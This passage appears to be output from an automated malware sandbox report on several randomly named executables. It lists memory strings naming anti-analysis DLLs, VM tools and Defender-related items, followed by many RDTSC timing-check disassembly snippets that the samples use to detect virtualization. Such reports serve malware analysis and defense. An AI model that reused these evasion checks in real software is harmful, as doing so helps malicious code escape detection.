%WGETPEERNAMEGETSOCKNAMEGLOBALALLOCHTTP2CLIENTHTTP2SERVERHTTPS_PROXYI/O TIMEOUTLOCAL ERRORMSPANMANUALMETHODARGS(MINTRIGGER=MOVE %S: %WMSWSOCK.DLLNETPOLLINITNEXT SERVERNIL CONTEXTOPERA-PROXYORANNIS.COMOUT OF SYNCPARSE ERRORPROCESS: %SREFLECT.SETREFLECTOFFSRETRY-AFTERRUNTIME: P RUNTIME: G RUNTIME: P SCHEDDETAILSECHOST.DLLSECUR32.DLLSERVICE: %SSHELL32.DLLSHORT WRITESTACK TRACESTART PROXYTASKMGR.EXETLS: ALERT(TRACEALLOC(TRAFFIC UPDUNREACHABLEUSERENV.DLLVERSION.DLLVERSION=195WININET.DLLWUP_PROCESS (SENSITIVE) B (
Source: fq9BbqPKEgDrDHrc1Aru5zuA.exe, 00000008.00000002.2290949834.0000000003A15000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL
Source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.0000000002F70000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: TOO MANY LINKSTOO MANY USERSTORRC FILENAMEUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERUSERARENASTATEVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WINDOW CREATEDWORK.FULL != 0XENSERVICE.EXEZERO PARAMETER WITH GC PROG
Source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.0000000002F70000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: ... OMITTING ACCEPT-CHARSETAFTER EFIGUARDALLOCFREETRACEBAD ALLOCCOUNTBAD RECORD MACBAD RESTART PCBAD SPAN STATEBTC.USEBSV.COMCERT INSTALLEDCHECKSUM ERRORCONTENT-LENGTHCOULDN'T PATCHDATA TRUNCATEDDISTRIBUTOR_IDDRIVER REMOVEDERROR RESPONSEFILE TOO LARGEFINALIZER WAITGCSTOPTHEWORLDGET UPTIME: %WGETPROTOBYNAMEGOT SYSTEM PIDINITIAL SERVERINTERNAL ERRORINVALID SYNTAXIS A DIRECTORYKEY SIZE WRONGLEVEL 2 HALTEDLEVEL 3 HALTEDMEMPROFILERATEMULTIPARTFILESNEED MORE DATANIL ELEM TYPE!NO MODULE DATANO SUCH DEVICEOPEN EVENT: %WPARSE CERT: %WPROTOCOL ERRORREAD CERTS: %WREAD_FRAME_EOFREFLECT.VALUE.REMOVE APP: %WRUNTIME: FULL=RUNTIME: WANT=S.ALLOCCOUNT= SEMAROOT QUEUESERVER.VERSIONSTACK OVERFLOWSTART TASK: %WSTOPM SPINNINGSTORE64 FAILEDSYNC.COND.WAITTEXT FILE BUSYTIME.LOCATION(TIMEENDPERIODTOO MANY LINKSTOO MANY USERSTORRC FILENAMEUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERUSERARENASTATEVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WINDOW CREATEDWORK.FULL != 0XENSERVICE.EXEZERO PARAMETER WITH GC PROG
Source: KUc3lCE6xAEEreIlM0ct4583.exe	Binary or memory string: RTP.EXESYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETTL EXPIREDUNINSTALLERVBOXSERVICEVMUSRVC.EXEVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDER[:^XDIGIT:]\DSEFIX.EXEADDITIONALSALARM CLOCKAPPLICATIONASSISTQUEUEAUTHORITIES

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: A2EBBB second address: A2EBBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: B989E3 second address: B989F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F0D2259C0h 0x00000009 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: B989F7 second address: B98A33 instructions: 0x00000000 rdtsc 0x00000002 js 00007F7F0D21AE06h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F7F0D21AE0Eh 0x00000012 push edx 0x00000013 pop edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 push edi 0x00000017 pop edi 0x00000018 popad 0x00000019 pushad 0x0000001a jmp 00007F7F0D21AE17h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BB2F83 second address: BB2FA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7F0D2259BCh 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f js 00007F7F0D2259B6h 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BB2FA3 second address: BB2FAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BB3108 second address: BB3127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F0D2259C0h 0x00000009 jns 00007F7F0D2259B8h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BB3127 second address: BB3135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jnp 00007F7F0D21AE06h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BB3135 second address: BB3161 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnl 00007F7F0D2259B6h 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 popad 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F7F0D2259C5h 0x0000001a push edi 0x0000001b pop edi 0x0000001c rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BB3161 second address: BB3165 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BB32C9 second address: BB32CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BB32CE second address: BB32EB instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7F0D21AE0Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F7F0D21AE06h 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BB32EB second address: BB32EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BB3756 second address: BB375A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BB38A6 second address: BB38BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F7F0D2259B6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jnl 00007F7F0D2259B6h 0x00000015 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BB38BB second address: BB38BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BB7467 second address: BB74DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 je 00007F7F0D2259BCh 0x0000000d jo 00007F7F0D2259B6h 0x00000013 popad 0x00000014 mov dword ptr [esp], eax 0x00000017 xor edi, 5D79EFDEh 0x0000001d push 00000000h 0x0000001f call 00007F7F0D2259C5h 0x00000024 mov dword ptr [ebp+122D2813h], ebx 0x0000002a pop esi 0x0000002b call 00007F7F0D2259B9h 0x00000030 pushad 0x00000031 jmp 00007F7F0D2259C2h 0x00000036 push ebx 0x00000037 jnc 00007F7F0D2259B6h 0x0000003d pop ebx 0x0000003e popad 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F7F0D2259C3h 0x00000049 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BB74DF second address: BB74E9 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7F0D21AE06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BB74E9 second address: BB74F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F0D2259BBh 0x00000009 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BB74F8 second address: BB74FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BB74FC second address: BB754D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jmp 00007F7F0D2259C5h 0x00000011 mov eax, dword ptr [eax] 0x00000013 jmp 00007F7F0D2259C8h 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F7F0D2259C0h 0x00000023 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BB754D second address: BB7577 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 mov dh, cl 0x0000000b push 00000003h 0x0000000d xor dword ptr [ebp+122D1943h], eax 0x00000013 push 00000000h 0x00000015 push 00000003h 0x00000017 mov di, AFDAh 0x0000001b push F342C3CBh 0x00000020 pushad 0x00000021 pushad 0x00000022 pushad 0x00000023 popad 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 push esi 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BB7689 second address: BB7725 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D2259C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F7F0D2259C5h 0x0000000e popad 0x0000000f pop eax 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007F7F0D2259B8h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 00000015h 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a cld 0x0000002b push 00000003h 0x0000002d sbb si, 83C9h 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push ebp 0x00000037 call 00007F7F0D2259B8h 0x0000003c pop ebp 0x0000003d mov dword ptr [esp+04h], ebp 0x00000041 add dword ptr [esp+04h], 00000018h 0x00000049 inc ebp 0x0000004a push ebp 0x0000004b ret 0x0000004c pop ebp 0x0000004d ret 0x0000004e mov dword ptr [ebp+122D1B42h], edi 0x00000054 push 00000003h 0x00000056 or esi, 7EE35B09h 0x0000005c sub dword ptr [ebp+122D17E7h], eax 0x00000062 push 6547EB49h 0x00000067 jns 00007F7F0D2259C8h 0x0000006d push eax 0x0000006e push edx 0x0000006f jne 00007F7F0D2259B6h 0x00000075 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BB779F second address: BB7821 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7F0D21AE06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jns 00007F7F0D21AE1Eh 0x00000011 nop 0x00000012 mov dword ptr [ebp+122D1864h], ecx 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push esi 0x0000001d call 00007F7F0D21AE08h 0x00000022 pop esi 0x00000023 mov dword ptr [esp+04h], esi 0x00000027 add dword ptr [esp+04h], 0000001Ah 0x0000002f inc esi 0x00000030 push esi 0x00000031 ret 0x00000032 pop esi 0x00000033 ret 0x00000034 call 00007F7F0D21AE13h 0x00000039 mov dword ptr [ebp+122D2A1Bh], eax 0x0000003f pop edx 0x00000040 mov dword ptr [ebp+122D186Eh], ecx 0x00000046 call 00007F7F0D21AE09h 0x0000004b pushad 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f pop eax 0x00000050 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BB7821 second address: BB782A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BB782A second address: BB785D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F7F0D21AE19h 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F7F0D21AE0Dh 0x00000017 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BB785D second address: BB7874 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D2259BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BB7874 second address: BB7878 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BB7878 second address: BB78B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F7F0D2259B8h 0x0000000c popad 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 pushad 0x00000012 jmp 00007F7F0D2259C3h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F7F0D2259BFh 0x0000001e rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BB78B0 second address: BB7923 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+122D3876h] 0x0000000e push 00000003h 0x00000010 mov dword ptr [ebp+122D1A8Ah], edx 0x00000016 push 00000000h 0x00000018 je 00007F7F0D21AE0Eh 0x0000001e jc 00007F7F0D21AE08h 0x00000024 push edx 0x00000025 pop edx 0x00000026 push 00000003h 0x00000028 jmp 00007F7F0D21AE19h 0x0000002d pushad 0x0000002e mov bx, 0DCFh 0x00000032 sub dword ptr [ebp+122D1856h], ebx 0x00000038 popad 0x00000039 call 00007F7F0D21AE09h 0x0000003e push ecx 0x0000003f jng 00007F7F0D21AE13h 0x00000045 pop ecx 0x00000046 push eax 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a pushad 0x0000004b popad 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BB7923 second address: BB7928 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BB7928 second address: BB794D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D21AE18h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BB794D second address: BB797D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D2259BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c jmp 00007F7F0D2259C4h 0x00000011 popad 0x00000012 popad 0x00000013 mov eax, dword ptr [eax] 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BB797D second address: BB7981 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BB7981 second address: BB7987 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BB7987 second address: BB79AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D21AE15h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BB79AA second address: BB79AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BB79AE second address: BB79B8 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7F0D21AE06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BB79B8 second address: BB79BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BD8F56 second address: BD8F5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BD8F5C second address: BD8F6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F0D2259BFh 0x00000009 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BD714B second address: BD714F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BD714F second address: BD7159 instructions: 0x00000000 rdtsc 0x00000002 je 00007F7F0D2259B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BD76D4 second address: BD76DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F7F0D21AE06h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BD76DF second address: BD76F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F7F0D2259BAh 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BD76F3 second address: BD7703 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jng 00007F7F0D21AE20h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BD784F second address: BD7856 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BD7856 second address: BD785E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BD7A16 second address: BD7A1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BD7A1A second address: BD7A1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BD7FCD second address: BD7FD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BD7FD1 second address: BD7FD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BD7FD7 second address: BD7FF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F0D2259C6h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BA7B35 second address: BA7B39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BD8693 second address: BD8697 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BDADDE second address: BDADE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BDADE2 second address: BDADE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BDD20D second address: BDD230 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D21AE11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F7F0D21AE0Eh 0x0000000e rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BDF118 second address: BDF11D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BDF11D second address: BDF135 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F0D21AE14h 0x00000009 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BDF87F second address: BDF8A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D2259C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
